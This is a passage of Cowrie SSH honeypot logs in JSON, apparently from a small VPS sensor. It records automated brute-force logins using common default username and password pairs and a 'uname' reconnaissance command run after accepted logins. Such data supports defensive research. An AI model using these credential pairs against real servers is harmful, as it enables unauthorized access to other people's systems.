ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:34:39.393283Z","src_ip":"212.227.235.229","session":"143efec1c2da"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"ftpuser","message":"login attempt [ftpuser/ftpuser] failed","sensor":"my-vps","timestamp":"2025-08-28T03:34:40.149374Z","src_ip":"212.227.235.229","session":"143efec1c2da"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:34:41.407560Z","src_ip":"212.227.235.229","session":"143efec1c2da"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48356,"dst_ip":"1.2.3.4","dst_port":22,"session":"e5141c4b9111","protocol":"ssh","message":"New connection: 212.227.125.160:48356 (1.2.3.4:22) [session: e5141c4b9111]","sensor":"my-vps","timestamp":"2025-08-28T03:34:48.027273Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:34:48.028203Z","src_ip":"212.227.125.160","session":"e5141c4b9111"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:34:48.255956Z","src_ip":"212.227.125.160","session":"e5141c4b9111"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":21645,"dst_ip":"1.2.3.4","dst_port":22,"session":"eb43873ca2c6","protocol":"ssh","message":"New connection: 45.125.211.194:21645 (1.2.3.4:22) [session: eb43873ca2c6]","sensor":"my-vps","timestamp":"2025-08-28T03:34:48.847592Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:34:48.862738Z","src_ip":"45.125.211.194","session":"eb43873ca2c6"}
{"eventid":"cowrie.login.success","username":"root","password":"123321","message":"login attempt [root/123321] succeeded","sensor":"my-vps","timestamp":"2025-08-28T03:34:48.941560Z","src_ip":"212.227.125.160","session":"e5141c4b9111"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:34:49.068119Z","src_ip":"45.125.211.194","session":"eb43873ca2c6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T03:34:49.479975Z","src_ip":"212.227.125.160","session":"e5141c4b9111"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T03:34:49.480638Z","src_ip":"212.227.125.160","session":"e5141c4b9111"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:34:49.709254Z","src_ip":"212.227.125.160","session":"e5141c4b9111"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:34:49.710418Z","src_ip":"212.227.125.160","session":"e5141c4b9111"}
{"eventid":"cowrie.login.failed","username":"es","password":"123","message":"login attempt [es/123] failed","sensor":"my-vps","timestamp":"2025-08-28T03:34:49.900440Z","src_ip":"45.125.211.194","session":"eb43873ca2c6"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:34:51.112796Z","src_ip":"45.125.211.194","session":"eb43873ca2c6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58796,"dst_ip":"1.2.3.4","dst_port":22,"session":"b990a5bc1758","protocol":"ssh","message":"New connection: 212.227.125.160:58796 (1.2.3.4:22) [session: b990a5bc1758]","sensor":"my-vps","timestamp":"2025-08-28T03:34:53.756384Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:34:53.757704Z","src_ip":"212.227.125.160","session":"b990a5bc1758"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:34:53.990929Z","src_ip":"212.227.125.160","session":"b990a5bc1758"}
{"eventid":"cowrie.login.failed","username":"worker","password":"worker123","message":"login attempt [worker/worker123] failed","sensor":"my-vps","timestamp":"2025-08-28T03:34:54.697286Z","src_ip":"212.227.125.160","session":"b990a5bc1758"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:34:55.932423Z","src_ip":"212.227.125.160","session":"b990a5bc1758"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41448,"dst_ip":"1.2.3.4","dst_port":22,"session":"d9606a2f9f8a","protocol":"ssh","message":"New connection: 212.227.235.229:41448 (1.2.3.4:22) [session: d9606a2f9f8a]","sensor":"my-vps","timestamp":"2025-08-28T03:34:56.486639Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:34:56.487662Z","src_ip":"212.227.235.229","session":"d9606a2f9f8a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:34:56.750464Z","src_ip":"212.227.235.229","session":"d9606a2f9f8a"}
{"eventid":"cowrie.login.failed","username":"worker","password":"worker123","message":"login attempt [worker/worker123] failed","sensor":"my-vps","timestamp":"2025-08-28T03:34:57.512939Z","src_ip":"212.227.235.229","session":"d9606a2f9f8a"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:34:58.768432Z","src_ip":"212.227.235.229","session":"d9606a2f9f8a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51888,"dst_ip":"1.2.3.4","dst_port":22,"session":"00640a874ec0","protocol":"ssh","message":"New connection: 212.227.235.229:51888 (1.2.3.4:22) [session: 00640a874ec0]","sensor":"my-vps","timestamp":"2025-08-28T03:35:02.821933Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:35:02.822807Z","src_ip":"212.227.235.229","session":"00640a874ec0"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:35:03.074533Z","src_ip":"212.227.235.229","session":"00640a874ec0"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":11280,"dst_ip":"1.2.3.4","dst_port":22,"session":"0a975283924c","protocol":"ssh","message":"New connection: 45.125.211.194:11280 (1.2.3.4:22) [session: 0a975283924c]","sensor":"my-vps","timestamp":"2025-08-28T03:35:03.812652Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:35:03.822541Z","src_ip":"45.125.211.194","session":"0a975283924c"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"ftpuser123","message":"login attempt [ftpuser/ftpuser123] failed","sensor":"my-vps","timestamp":"2025-08-28T03:35:03.833243Z","src_ip":"212.227.235.229","session":"00640a874ec0"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:35:04.033823Z","src_ip":"45.125.211.194","session":"0a975283924c"}
{"eventid":"cowrie.login.success","username":"root","password":"Password1","message":"login attempt [root/Password1] succeeded","sensor":"my-vps","timestamp":"2025-08-28T03:35:04.854925Z","src_ip":"45.125.211.194","session":"0a975283924c"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:35:05.086748Z","src_ip":"212.227.235.229","session":"00640a874ec0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T03:35:05.288560Z","src_ip":"45.125.211.194","session":"0a975283924c"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T03:35:05.289240Z","src_ip":"45.125.211.194","session":"0a975283924c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:35:05.498634Z","src_ip":"45.125.211.194","session":"0a975283924c"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:35:05.499724Z","src_ip":"45.125.211.194","session":"0a975283924c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34096,"dst_ip":"1.2.3.4","dst_port":22,"session":"ff077e9d77bb","protocol":"ssh","message":"New connection: 212.227.235.229:34096 (1.2.3.4:22) [session: ff077e9d77bb]","sensor":"my-vps","timestamp":"2025-08-28T03:35:08.631479Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:35:08.632416Z","src_ip":"212.227.235.229","session":"ff077e9d77bb"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:35:08.878131Z","src_ip":"212.227.235.229","session":"ff077e9d77bb"}
{"eventid":"cowrie.login.failed","username":"admin","password":"password","message":"login attempt [admin/password] failed","sensor":"my-vps","timestamp":"2025-08-28T03:35:09.618250Z","src_ip":"212.227.235.229","session":"ff077e9d77bb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46129,"dst_ip":"1.2.3.4","dst_port":22,"session":"886f054c470c","protocol":"ssh","message":"New connection: 212.227.235.229:46129 (1.2.3.4:22) [session: 886f054c470c]","sensor":"my-vps","timestamp":"2025-08-28T03:35:09.837873Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-08-28T03:35:09.847561Z","src_ip":"212.227.235.229","session":"886f054c470c"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-08-28T03:35:09.936516Z","src_ip":"212.227.235.229","session":"886f054c470c"}
{"eventid":"cowrie.login.failed","username":"int","password":"int","message":"login attempt [int/int] failed","sensor":"my-vps","timestamp":"2025-08-28T03:35:10.336623Z","src_ip":"212.227.235.229","session":"886f054c470c"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:35:10.865519Z","src_ip":"212.227.235.229","session":"ff077e9d77bb"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:35:11.446603Z","src_ip":"212.227.235.229","session":"886f054c470c"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":40836,"dst_ip":"1.2.3.4","dst_port":22,"session":"d8732814b101","protocol":"ssh","message":"New connection: 45.125.211.194:40836 (1.2.3.4:22) [session: d8732814b101]","sensor":"my-vps","timestamp":"2025-08-28T03:35:18.533069Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:35:18.544937Z","src_ip":"45.125.211.194","session":"d8732814b101"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:35:18.742890Z","src_ip":"45.125.211.194","session":"d8732814b101"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"1qaz@WSX","message":"login attempt [oracle/1qaz@WSX] failed","sensor":"my-vps","timestamp":"2025-08-28T03:35:19.571709Z","src_ip":"45.125.211.194","session":"d8732814b101"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:35:20.782286Z","src_ip":"45.125.211.194","session":"d8732814b101"}
